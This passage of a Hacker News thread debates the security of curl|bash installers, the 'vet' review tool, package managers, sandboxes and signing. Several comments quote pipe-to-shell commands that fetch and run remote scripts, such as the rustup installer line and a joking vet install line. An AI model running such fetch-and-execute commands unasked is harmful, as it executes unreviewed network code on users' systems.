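    return $status
}
# usage: vet_run https://example.invalid/install.sh
```

What vet adds on top of this is diffing against a previously reviewed copy, so you notice if the script changed since last time.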
jrm4 · 23h ago
As an old-timer, going through this thread, I must say that there's just not enough hate for the whole Windows/Mac OS inclination to not want to let users be experimental.

Everyone here is sort of caught up in this weird middle ground, where you're expecting an environment that is both safe and experimental -- but the two dominant OSes do EVERYTHING THEY CAN to kill the latter, which, funny enough, can also make the former worse.

Do not forget, for years you have been in a world in which Apple and Microsoft do not want you to have any real power.

Galanwe · 1d ago
The whole point of "curl|bash" is to skip dependency on package managers and install on a barebones machine. Installing a tool that allows you to install tools without an installation tool is...
chii · 1d ago
but then it needs to come with a curl|bash uninstall tool. Most of these install scripts are just half the story, and the uninstalling part doesn't exist.
ryandrake · 1d ago
Sadly, a great many 3rd party developers don't give a single shit about uninstallation, and won't lift a finger to do it cleanly, correctly and completely. If their installer/packager happens to do it, great, but they're not going to spend development cycles making it wonderful.
thewebguyd · 1d ago
This is why its so upsetting over in Linux land how so many people are just itching to move away from distro package managers and package maintainers. Curl | bash is everywhere now because "packaging is hard" and devs can't be arsed to actually package their software for the OS they developed it for.

Like, yeah I get it - it's frustrating when xyz software you want isn't in the repos, but (assuming it's open source) you're also welcome to package it up for your distro yourself. We already learned lessons from Windows where installers and "uninstallers" don't respect you or your filesystem. Package managers solved this problem many, many years ago.

maccard · 22h ago
What package manager would you recommend that allows a one line install on windows (wsl), Mac, debian, fedora and arch?
jrpear · 21h ago
For those install scripts which allow changing the install prefix (e.g. autoconf projects, though involving a build step too), I've found GNU Stow to be a good solution to the uninstall situation. Install in `/usr/local/stow` or `~/.local/stow` then have Stow set up symlinks to the final locations. Then uninstall with `stow --delete`.
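Concretely, the workflow looks roughly like this. A sketch: `mytool` and the paths are made up, the installer step is faked with a printf, and the stow call is guarded in case Stow isn't installed:

```shell
STOWDIR="$HOME/.local/stow"
PREFIX="$STOWDIR/mytool-1.0"
mkdir -p "$PREFIX/bin" "$HOME/.local"
# stand-in for: ./install.sh --prefix="$PREFIX"
printf '#!/bin/sh\necho mytool 1.0\n' > "$PREFIX/bin/mytool"
chmod +x "$PREFIX/bin/mytool"
if command -v stow >/dev/null 2>&1; then
    stow -d "$STOWDIR" -t "$HOME/.local" mytool-1.0 \
        || echo "stow reported a conflict" >&2     # symlinks into ~/.local/bin
    # uninstall later with:
    # stow -d "$STOWDIR" -t "$HOME/.local" --delete mytool-1.0
else
    echo "GNU Stow not installed; skipping the symlink step" >&2
fi
```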
ndsipa_pomu · 1d ago
Most of the time I've seen curl|bash, it is to add a repository source to the package manager (debian/ubuntu).
nikisweeting · 23h ago
this is the only sane way to do it, curl|sh should just automate the package manager commands
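For reference, what such a repo-setup script typically boils down to on Debian/Ubuntu. The URLs and names are placeholders; current practice is a dedicated keyring plus a `signed-by` sources entry rather than the deprecated apt-key:

```shell
# 1. fetch the vendor signing key into its own keyring
KEYRING=/usr/share/keyrings/example-archive.gpg
curl -fsSL https://example.invalid/key.asc | sudo gpg --dearmor -o "$KEYRING"
# 2. add a sources entry that trusts only that keyring
echo "deb [signed-by=$KEYRING] https://example.invalid/apt stable main" \
    | sudo tee /etc/apt/sources.list.d/example.list
# 3. install through the package manager as usual
sudo apt update && sudo apt install example-tool
```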
totetsu · 12h ago
Isn't it better to run with firejail or bubblewrap to contain the changes to an overlayfs or whatever and see exactly what the script would do before running it?
smallerfish · 10h ago
Yes but it's clunky as hell. We need something like a curl x.sh | firejail --new, which prompts a) do you want overlayfs? b) do you want network isolation? c) do you want to allow home directory access?
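A guarded sketch of what the bubblewrap half looks like today; the flags follow my reading of the bwrap options and may need adjusting per system:

```shell
# give the installer a read-only view of /, a throwaway $HOME, and no network
printf 'echo "installer ran with HOME=$HOME"\n' > /tmp/untrusted-install.sh
if command -v bwrap >/dev/null 2>&1; then
    bwrap --ro-bind / / --dev /dev --proc /proc \
          --tmpfs "$HOME" --unshare-net \
          sh /tmp/untrusted-install.sh \
        || echo "bwrap refused to run here (no user namespaces?)" >&2
else
    echo "bwrap not installed" >&2
fi
```

Which is exactly the clunkiness being complained about: nobody remembers five mount flags when `| bash` is right there.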

And then, some equivalent for actually running whatever was installed. This would need to introspect what the installation script did and expose new binaries, which of course run inside the sandbox when invoked.

To move past the "| bash" lazy default, people need an easy to remember command. The complexity of the UI of these tools hinders adoption.

aezart · 1d ago
I think aside from any safety issues, another reason to prefer a deb or something over curl | bash is that it lets your package manager know what you're installing. It can warn you about unmet dependencies, it knows where all the individual components are installed, etc. When I see a deb I feel more confident that the software will play nicely with other stuff on the system.
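For example, on a dpkg-based system the package manager can answer questions a curl | bash install can't (guarded in case it isn't one):

```shell
if command -v dpkg >/dev/null 2>&1; then
    dpkg -L coreutils | head -n 5          # which files does this package own?
    dpkg -S "$(command -v ls)" || true     # which package owns this file?
else
    echo "not a dpkg-based system" >&2
fi
```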
mid-kid · 10h ago
In my experience, too many of these curl scripts are a bootstrap for another script or tarball which gets downloaded from somewhere else, and then downloads more stuff. Looking at just the main script tells you nothing. Consider for example the rust install procedure: It downloads a binary rustup, for bootstrapping, which then does the installation procedure and embeds itself into your system, and then downloads the actual compiler, and you have no chance of verifying the whole chain, nor really knowing what it changes until after the fact. Consider also systems like `pip` which through packages like puccinialin do the same inscrutable installation procedure, when a rust-based python package needs to be compiled.

Suffice to say, it's best to avoid any of this, and do it using the package manager, or manually. I only run scripts like this on systems that I otherwise don't care about, or in throwaway containers.

gchamonlive · 1d ago
I like that vet, which wraps the `curl | bash` pattern, can be installed via the `curl | bash` pattern but it's documented under https://github.com/vet-run/vet?tab=readme-ov-file#the-trusti....

I don't see it in arch's aur though. That would be my preferred install method. Maybe I'd take a look at it later if it's really not available there.

sgc · 1d ago
Given the conversations in this thread about the annoying package management that leads to so much use of curl | bash, I have a question: Which Linux distro is the least annoying in this regard? Specifically, I mean 1) packages are installed in a predictable location (not one of 3-5 legacy locations, or split between directories); 2) configuration files are installed in a predictable location; 3) Packages are up to date; 4) There is a large selection of software in the repositories; 5) Security is a priority for the distro maintainers; 6) It's not like pulling teeth if I want/need to customize my setup away from the defaults.

I have always used Debian / Ubuntu because I started with my server using them and have wanted to keep the same tech stack between server and desktop - and they have a large repository ecosystem. But the fragmentation and often times byzantine layout is really starting to grind my gears. I sometimes find a couple overlapping packages installed, and it requires research and testing to figure out which one has priority (mainly networking...).

Certainly, there is no perfect answer. I am just trying to discover which ones come close.

GrantMoyer · 1d ago
Try Arch Linux. It hits all your points except maybe 5.

1. It symlinks redundant bin and lib directories to /usr/bin, and its packages don't install anything to /usr/local.

2. You can keep most config files in /etc or $XDG_CONFIG_HOME. Occasionally software doesn't follow the standards, but that's hardly the distro's fault.

3. Arch is bleeding edge

4. Arch repos are pretty big, plus there's the AUR, plus packaging software yourself from source or binaries is practically trivial.

5. Security is not the highest priority over usability. You can configure SELinux and the like, but they're not on by default. See https://wiki.archlinux.org/title/Security.

6. There are few defaults to adhere to on Arch. Users are expected to customize.

Elfener · 1d ago
I switched to NixOS to solve this sort of problem.

Configuration of system-wide things is done in the nix language in one place.

It also has the most packages of any distro.

And I found packaging to be more approachable than other distros, so if something isn't packaged you can do it properly rather than just curl|bash-ing.

lima · 1d ago
The only distros that are cleanly customizable are declarative ones like NixOS or Guix.
speed_spread · 1d ago
I'm using Fedora Kinoite with distrobox. My development envs are containerized. This makes it easy to prevent tech stacks from interfering and also provides some security because any damage should be contained to the container. It does add initial overhead to the setup but once you get going it's great.
Sanzig · 1d ago
I wonder if domain validation might be a good addition to this? You could encode a public key in a TXT record for the domain, and if present, vet could check a signature in the shell script against the key in the TXT record. It wouldn't stop attacks where the owner lost control of the DNS records, but it would stop the "webserver hijack" attack vector.
goku12 · 1d ago
That's what they do in DKIM signing of emails. But if you want to go that route, there are easier solutions. For example, Github and Gitlab expose your SSH keys at a specific URL. You could use those (for ssh signing) if you trust the account. Another even easier method is to use something like cosign (sigstore) if you trust a PKI. Or you could use WebFinger to advertise signify keys or Web Key Directory (WKD) to expose OpenPGP keys, etc.
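The ssh signing route is already scriptable with stock OpenSSH (8.0+). A sketch with a throwaway key; in practice the public key in `allowed_signers` comes from the account page you trust, not a file you just generated:

```shell
# maintainer side: sign the install script
ssh-keygen -t ed25519 -N '' -q -f signer_key
echo 'echo installing...' > install.sh
ssh-keygen -Y sign -f signer_key -n file install.sh        # writes install.sh.sig

# user side: verify against the published public key before running anything
printf 'maintainer@example.invalid %s\n' "$(cut -d' ' -f1-2 signer_key.pub)" > allowed_signers
ssh-keygen -Y verify -f allowed_signers -I maintainer@example.invalid \
    -n file -s install.sh.sig < install.sh
```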
maxboone · 1d ago
TLSA records exist, but are for the entire server rather than a single binary or script.
tyingq · 1d ago
An option to run the potentially harmful script in a rootless container, then dump filesystem diffs, audit events, etc...might be helpful.

I get containers aren't perfect isolation, but...

ilyagr · 1d ago
One option is https://github.com/binpash/try

It is Linux-only, though.

eptcyka · 1d ago
Could do it in a VM too.
burnt-resistor · 13h ago
The greater problem is the pattern of not first running things inside a sandbox and auditing the various food groups, including dependencies, network interactions, modifications, and final results.

In reality, system packaging and configuration management tend to be the preferred ways out at scale, rather than adding system entropy with "here, run this script".

Btw, there is a tool on debian I abuse to replace system dependencies and package things (in lieu of checkinstall) called equivs. And, to find changes, I use cruft-ng which depends upon plocate.

bugsMarathon88 · 1d ago
The solution to executing untrusted code is not to execute more untrusted code, especially through a tool which has not itself been "vetted".
oytis · 12h ago
Can't see what security it adds at all. The whole thing looks a lot like enterprise-quality fizzbuzz, with the core being a small script essentially doing `curl | bash`, but much more verbosely - and a lot of boilerplate (tests, packaging etc.) around it.
jimmaswell · 1d ago
Had there been a single notable incident of curlbash leading to a malware outbreak that this would have prevented?
stouset · 1d ago
No, because if someone can compromise your curlbash, they can just as easily compromise the binary package you’re installing with it.
TZubiri · 1d ago
Lol
djha-skin · 1d ago
I love articles like these that show me new tools instead of showing me new AI tricks. This is the kind of thing I'm on Hacker News for. I miss the 2010s, when people were writing tools for other people. Nowadays it's all about how I can get AI to write it for me, poorly.
jwilk · 1d ago
If bat is not available, vet uses less, which is not a faithful pager:

https://github.com/jwilk/unfaithful-less

It seems at least some versions of bat have the same problem, but I didn't look into the details.

wpollock · 16h ago
For Linux, I used to use checkinstall to create a package when installing from make. It watches the make, and adds an uninstall. Works for several package management systems such as .rpm and .deb.

For CMake there is a similar tool I believe, CPack.

Is there any such tool for shell script installers?

ojosilva · 1d ago
Funny, I had this need just today, with a not-so-popular GitHub repo I cloned. Before running it, I opened the folder in Cursor and requested a check for suspicious activity; after a good scan of the README and source files, Cursor reported back that it was OK to proceed.

I think getting an (optional?) AI heads-up before reviewing it myself would be great for cURL shell scripts as well. I'm prone to not seeing dark patterns in editor, and tools like vet could as well be tricked into not seeing the dark pattern, malicious intent, or just hazardous code lurking.

alienbaby · 1d ago
I wouldn't quite trust an AI's opinion on whether given code is malicious or not - maybe in the future, but not quite yet.
MathMonkeyMan · 14h ago
I do this:

    $ curl 'https://who.knows.man/installer.sh' >/tmp/install
    $ vim /tmp/install
    [... time passes ...]
    $ sh /tmp/install
jraph · 1d ago
Nice. Next step: provide an interactive shell (plugin) that detects curl | (ba)sh and suggests running vet instead.
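A crude after-the-fact version for bash is just a PROMPT_COMMAND hook. A sketch: a real plugin would hook preexec (zsh) or bash-preexec to warn before the command runs rather than after:

```shell
# nags you after you run a pipe-to-shell command (bash, interactive shells)
warn_curl_bash() {
    last=$(fc -ln -1 2>/dev/null)
    case $last in
        *curl*'|'*bash*|*curl*'|'*sh*|*wget*'|'*bash*|*wget*'|'*sh*)
            echo "hint: next time consider 'vet <url>' instead of piping to a shell" >&2 ;;
    esac
}
PROMPT_COMMAND=warn_curl_bash
```

The pattern match is deliberately sloppy; it will also fire on things like `curl x | shuf`, which is the price of a one-liner.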
evertheylen · 1d ago
Another approach I wrote to protect your system from untrusted dependencies (for Linux devs): https://evertheylen.eu/p/probox-intro/

Happy to hear other people's thoughts!

fsckboy · 1d ago
a zillion comments here and it's not mentioned yet:

packages are installed as root/admin with elevated privilege

packages are run as ordinary lusers

this is why curl|bash is a more dangerous thing to do.

traditionally, the people with the root password were experienced and trained for this type of analysis, but with personal machines this line of defense does not exist

yes, there are scripts also built into package installers. now you can understand why there shouldn't be, or at least the post-install script can be inspected (this is a major benefit of scripts)
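Those maintainer scripts are plain files you can pull out and read before installing; building a toy .deb shows the round trip (guarded in case dpkg-deb isn't available):

```shell
mkdir -p toy-pkg/DEBIAN
cat > toy-pkg/DEBIAN/control <<'EOF'
Package: toy
Version: 1.0
Architecture: all
Maintainer: nobody <nobody@example.invalid>
Description: demo package
EOF
printf '#!/bin/sh\necho "postinst would run as root here"\n' > toy-pkg/DEBIAN/postinst
chmod 755 toy-pkg/DEBIAN/postinst
if command -v dpkg-deb >/dev/null 2>&1; then
    dpkg-deb -b toy-pkg toy.deb >/dev/null
    dpkg-deb -e toy.deb toy-control       # extract the control area
    cat toy-control/postinst              # review it before any install
else
    echo "dpkg-deb not available" >&2
fi
```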

all the noise you want to make about how different distros make the problem harder is part of the problem if your solution is to capitulate to practices which are unsafe-by-design

neilv · 1d ago
Some municipalities operate relatively safe locations where drug addicts can shoot up.

But the conventional wisdom is that it's better not to shoot up at all.

Kinrany · 1d ago
What does it do about the curl|bash itself downloading software at runtime?
krunck · 1d ago
That's why you need to inspect the script.
stouset · 1d ago
And if I—an evildoer—leave the script alone and simply replace the installed binaries with compromised ones?
marssaxman · 1d ago
I wonder what this program's `diff` feature is intended for? I can't think of a time when I've wanted to run the same install script more than once.
lorenzohess · 1d ago
curl github.com/vet-run/install.sh | bash
codedokode · 1d ago
This shows how bad things are in Linux land and how unfriendly Linux is for third-party apps. The idea that someone will package every application for every Linux distribution is delusional. The proper solution is to provide a standard API and build applications against that API. And of course there should be a sandbox for third-party apps.

Compare this to Windows where there is a standard API, standard set of pre-installed fonts and libraries, you download an exe and it "just works". However Windows has no sandbox and is not secure at all if you install any third-party apps. There are antiviruses, but they cannot guarantee detection of malicious code, and do not even try to block less malicious code like tracking and telemetry.

One might notice that there are Snap/Flatpak; however, the issue with them is that the applications there mostly don't work properly and have a lot of bugs. Also they do not sandbox properly; for example, they do not prevent reading serial numbers of equipment.

globular-toast · 10h ago
There are some more obvious things you should do (in order):

1. Have backups. You are running software all the time that can corrupt your files, either maliciously or, more likely, accidentally. It doesn't really matter where it comes from.

2. Get into the habit of running things in sandboxes. You don't need anything magical here, a separate (unprivileged) user account is a good enough sandbox for many things. I outline an approach for installing Calibre like this on my blog[0] (the official site uses the `curl ... | sudo sh` pattern!)

You could do more clever things like using bwrap[1] to isolate things, or use a distro designed for this kind of thing. Be aware if using a separate user account that your home directory might still be readable so if you're worried about privacy check that, or use bwrap so it's not exposed at all.

[0] https://blog.gpkb.org/posts/calibre-rootless-install/

[1] https://github.com/containers/bubblewrap

do_not_redeem · 1d ago
It's crazy that so much ink is spilled on curl | bash, but then those same people will happily run the 50MB binary it downloads for you without a second thought. Someone explain this to me, please.

Let's consider rust: https://www.rust-lang.org/tools/install

Specifically, consider these two files:

A. a shell script, written by the Rust core developers, hosted on the Rust official website behind TLS

B. a compiler binary, written by the Rust core developers, hosted on the Rust official website behind TLS

Why is everyone so afraid of A, but not afraid of B?

bongodongobob · 1d ago
Tired of pointless "security" nonsense. This is silly.
lofaszvanitt · 18h ago
This is dangerous. The script could be malicious, the server could be compromised, or a transient network error could result in executing a partial script.

----

0.001% chance. But ok.

lodefende · 23h ago
Hahaha, optional system?
exitb · 1d ago
I was hoping this would have a curl | bash installer. Was not disappointed!
xyst · 1d ago
Can’t recall the last time I used `curl … | bash` to install anything on personal or remote devices.

Switched to nix + home-manager as a package manager to replace defacto package managers on some operating systems (ie, darwin uses macports or homebrew).

In cases where the package isn’t available in nixpkgs, can create my own derivation and build it from source.

If I am super paranoid, spin up sandboxed vm with minimal nixos. Use nixos-anywhere to setup vm. Install/build suspicious package. Then do reconnaissance. Nuke the vm after I am done.

Nix, like any other software, isn't foolproof. Something is likely to get through. In that case, identify the malicious package in the nix store. Update your flake to remove/patch the software that introduced it. Then nuke the system completely.

Then rebuild system using your declarative system configuration without malicious software.

Is nix for everyone? God no, there’s a massive learning curve. But I will say that once you get past this learning curve, you will never need to install anything with this pattern.

devmor · 1d ago
I like this. Convincing people not to pipe remote scripts to their shell seems like a lost battle, so making it safer to do is a very good mitigation strategy.
superkuh · 1d ago
Indeed. curl | sh is literally the #1 recommended and most common way to install the rust development toolchain (because it changes too rapidly to effectively be in any repos). It's crazy that a language that prioritizes security so highly in its design itself is only compiled through such insecure methods.

Ref: https://www.rust-lang.org/tools/install

    >Using rustup (Recommended)

    >It looks like you’re running macOS, Linux, or another Unix-like OS. To download Rustup and install Rust, run the following in your terminal, then follow the on-screen instructions. See "Other Installation Methods" if you are on Windows.

    >curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh
kibwen · 1d ago
> such insecure methods

No, your security model is flawed. curl-to-bash is equivalent to running arbitrary code on your device. If the Rust developers wanted to root you, they could easily just put the backdoor into the compiler binary that you are asking to receive from them.

mustache_kimono · 1d ago
> curl | sh is literally the #1 recommended and most common way to install the rust development toolchain

Rust provides a uniform way to install on any Unix, you say? Compared to the polyglot boarding house that is Linux package management?

> because it changes too rapidly to effectively be in any repos

rustup is also installable via your package manager, but, if it isn't, that's kinda your own distro's problem. The problem is that Linux is non-uniform. The problem is not Rust for providing a uniform, lowest common denominator, method for Unix. Notice Windows doesn't have the same problem.

See: https://rust-lang.github.io/rustup/installation/other.html

> It's crazy that a language that prioritizes security so highly in it's design itself is only compiled through such insecure methods.

Compiled?

Please explain the material security differences between the use of rustup.rs method vs. using a package manager.

I'll wait.

goku12 · 1d ago
That's a misunderstanding. You can completely avoid the curl bash pattern if you can install the rustup binary and setup the relevant environment variables (like PATH) manually. Everything else, including cargo and various toolchain versions are installed and managed by rustup. And rustup doesn't have as much churn as the rest of the tools. So, rustup can be (and is) packaged for many distributions. That's all that's necessary in practice. They recommend curl bash because it automates all the above in a single script without exposing such lengthy explanations to a beginner.
pixelesque · 1d ago
What exactly are you arguing?

The Parent poster is arguing that the "recommended" way documented on the Rust website to install rustup is using curl bash, and you're saying "it's possible to do things manually".

How is that helpful to the vast majority of the people on Mac/Linux trying to install Rust from scratch and reading the instructions on the website?

goku12 · 21h ago
> What exactly are you arguing?

This part:

> ... to install the rust development toolchain (because it changes too rapidly to effectively be in any repos)

Rust toolchain is installed using rustup, not curl bash. It's rustup that's installed using curl bash. And while the site does recommend it, installing rustup alone securely is far easier than the entire toolchain.

> How is that helpful to the vast majority of the people on Mac/Linux trying to install Rust from scratch and reading the instructions on the website?

If you're concerned about running a remote script, just check how much work the script actually does. If it's not much, it may be worth exploring the alternative ways for it. For example, the rustup package in Arch Linux [1] does the same thing as what you get from curl bash.

I have mise installed - another package which recommends installation using curl bash. But I don't use it, because it's really easy to install it manually. And when some other tool recommends curl bash, I check if it's supported by mise. As it turns out, rustup can be installed using mise [2].

[1] https://wiki.archlinux.org/title/Rust#Arch_Linux_package

[2] https://mise.jdx.dev/lang/rust.html

navels · 1d ago
same parent had said "It's crazy that a language that prioritizes security so highly in it's design itself is only compiled through such insecure methods."
superkuh · 1d ago
>You can completely avoid the curl bash pattern if you can install the rustup binary and setup the relevant environment variables (like PATH) manually.

Are you saying that if you avoid the curl bash pattern then you can avoid the curl bash pattern? This is true, and trivial, and completely irrelevant to what the rust website recommends and what most people do.

There's definitely been a misunderstanding. The misunderstanding is that you think people are installing rust from rustup from their repos. The website shows you this is not the most common case.

I do get your point that it doesn't have to be this way anymore. That rustup itself could be in repos and still work (even if rustc/etc can't). But this is not how it has been done for rust's entire existence, and change is slow and hard. Is there a single distro that does do this now?

kibwen · 1d ago
> That rustup itself could be in repos and still work

So surely you acknowledge that rustup not being in any given distro's repo isn't something that the Rust developers have control over? How do you expect the Rust devs to distribute the compiler? If you want to build from source, that's extremely easy. For people who want convenient binaries, Rust also offers binaries via the most convenient means available, which is curl-to-bash. This isn't a security flaw any more than running the compiler itself is.

veber-alex · 1d ago
rustup is available on plenty of distros now, and it's on homebrew in macOS.

The Rust docs should really offer installation methods other than curl | sh. Not from a security standpoint (I think that's nonsense) but I just don't like polluting my system with random stuff that is not managed by a package manager.

Edit: Yes, there is an "other installation methods" link, but the text makes it sound like it is only applicable for Windows.

shadowgovt · 1d ago
This is probably the key idea in this specific context: the tool you're downloading is a compiler. If you don't trust the bash script hosted by the compiler's creators (assuming you're properly certificate-checking the curl connection and not bypassing TLS), why would you trust the compiler binary it's trying to install?
superkuh · 1d ago
I trust Debian to vet and package things in a way that won't break my desktop. I don't trust the Rust organization because their goals are very different.
mustache_kimono · 1d ago
> I trust Debian to vet and package things in a way that won't break my desktop.

Um, has there been some instance where rustup broke a desktop? And I'm assuming Debian has actually delivered on this worst case scenario?

shadowgovt · 1d ago
Debian's done a pretty good job here. If you run unstable you'll get up to Rust 1.85 (whereas the project home will get you 1.88).

Of course, it's Debian; stable is alllll the way back on 1.63, state of the art in 2022.

mustache_kimono · 21h ago
> Debian's done a pretty good job here.

I meant I bet Debian has broken desktops with a simple `apt update`. Whereas show me where rustup has broken a desktop?

shadowgovt · 1d ago
I'm not sure how that's relevant for rust. I'm trying to think of a way they could distribute the rust toolchain that would break your desktop; does your desktop have a native rust install that other pieces of the distro are relying on to have a particular configuration (like the gcc most distros ship with) that a curl | bash installed toolchain would interfere with?
superkuh · 1d ago
>you acknowledge that rustup not being in any given distro's repo isn't something that the Rust developers have control over

The lack is a consequence of the type of language rust developers chose to be. One that is constantly, rapidly (over just a few months) changing itself in forwards incompatible ways. Other languages don't really have this problem. Even c++ you only have breaking changes every 3-4 years which can be handled by repos. But 3 months old rustc in $distro repos is already fairly useless. Not because rust is a bad language, but because the types of people that write in rust are all bleeding edge early adopters and always use $latest when writing. In another decade or so when the rust developer demographics even out a bit it will probably be okay.
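The version-churn problem is also exactly why per-project pinning exists: rustup reads a `rust-toolchain.toml` file in a project's root, so a slow-moving distro compiler and a pinned project toolchain can coexist. A sketch, assuming rustup is installed (the channel value is just an example):

```shell
# Set up a throwaway project directory with a pinned toolchain.
# rust-toolchain.toml is a real rustup convention; "1.88.0" is an example.
mkdir -p /tmp/demo-project && cd /tmp/demo-project
cat > rust-toolchain.toml <<'EOF'
[toolchain]
channel = "1.88.0"
EOF
# Any `cargo` or `rustc` invocation in this directory now uses the pinned
# toolchain (rustup fetches it on first use).
```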

goku12 · 20h ago
> The misunderstanding is that you think people are installing rust from rustup from their repos.

No. The misunderstanding is that you decided that I was talking about how people choose to install rustup, while I didn't even mention it. My reply was entirely about how the entire rust toolchain doesn't have to be in the distro repo. Here's the part in the original comment that I was referring to as a misunderstanding:

> to install the rust development toolchain (because it changes too rapidly to effectively be in any repos).

> This is true, and trivial, and completely irrelevant to what the rust website recommends and what most people do.

Irrelevant to you perhaps. But it's a relevant detail if you're an individual user/developer who cares about security. It's easy to entirely skip the curl bash pattern for rust if you care enough.

The question of why the website recommends it is moot, because they wrote the script and vetted it among themselves. They have no reason to mistrust it. Meanwhile, the security culture of the user is not really their concern. It's not unreasonable for them to expect you to read a bash script from the net before executing it. I did, and that's how I realized that there are alternatives.

If you think that it's unreasonable, look at how many projects, including programming languages recommend the same. The prevailing sentiment among the devs is clear - "Here's a script to do it easily. We haven't put anything harmful in it. But we assume that that's not enough guarantee for you. So just check the script first. It's just non obfuscated bash". I almost always find ways to avoid the curl bash step whenever a project recommends it.
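As a concrete instance, reading rustup's installer is how you learn about knobs the landing page never mentions. `RUSTUP_HOME` and `CARGO_HOME` are documented rustup environment variables; the paths below are just examples:

```shell
# Relocate rustup's state out of the default ~/.rustup and ~/.cargo
# before running the installer; rustup itself honors the same variables.
export RUSTUP_HOME="$HOME/.local/share/rustup"
export CARGO_HOME="$HOME/.local/share/cargo"
# Binaries end up under $CARGO_HOME/bin, so that is what goes on PATH:
echo "toolchains -> $RUSTUP_HOME, binaries -> $CARGO_HOME/bin"
```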

> Is there a single distro that does do this now?

Enjoy the following articles in the Arch Linux, Gentoo and Debian wikis discussing this exact topic. Not only do they have rustup packaged in their repos, rustup even has build configurations to make it behave nicely with the rest of the system in such a scenario (like following the FHS and disabling self-updates).

[1] https://wiki.archlinux.org/title/Rust#Arch_Linux_package

[2] https://wiki.gentoo.org/wiki/Rust#Rustup

[3] https://wiki.debian.org/Rust

nailer · 1d ago
Reminder that the pattern carries the same risk as downloading any software whose source you haven't audited and whose binary you haven't verified against that source.
mrspuratic · 1d ago
Reminder that there is the reductive argument that basically everything you download is arbitrary code, but throwing away the code that is run seems uniquely silly.
aflag · 1d ago
How is it silly to throw away code that you'll run only once?
nailer · 1d ago
> Reminder that there is the reductive argument that basically everything you download is arbitrary code

I'm not sure why you think pointing out the risk of regular unaudited, unverifiable downloads is reductive, since you haven't provided any supporting argument, only snark.

> throwing away the code that is run seems uniquely silly.

Neither traditional downloads nor curl | bash scripts are commonly stored long term for analysis.
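For what it's worth, keeping the piped script around costs one extra word in the pipeline. A sketch using `tee` (a local file stands in for the remote download so this runs offline):

```shell
# Stand-in for the remote installer script:
printf 'echo hello from installer\n' > /tmp/fake-remote.sh

# Instead of `curl ... | sh`, split the stream so an audit copy survives:
cat /tmp/fake-remote.sh | tee /tmp/installer-audit-copy.sh | sh
```

The script still runs exactly once, but the bytes that ran are now on disk if you ever need to look at them.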
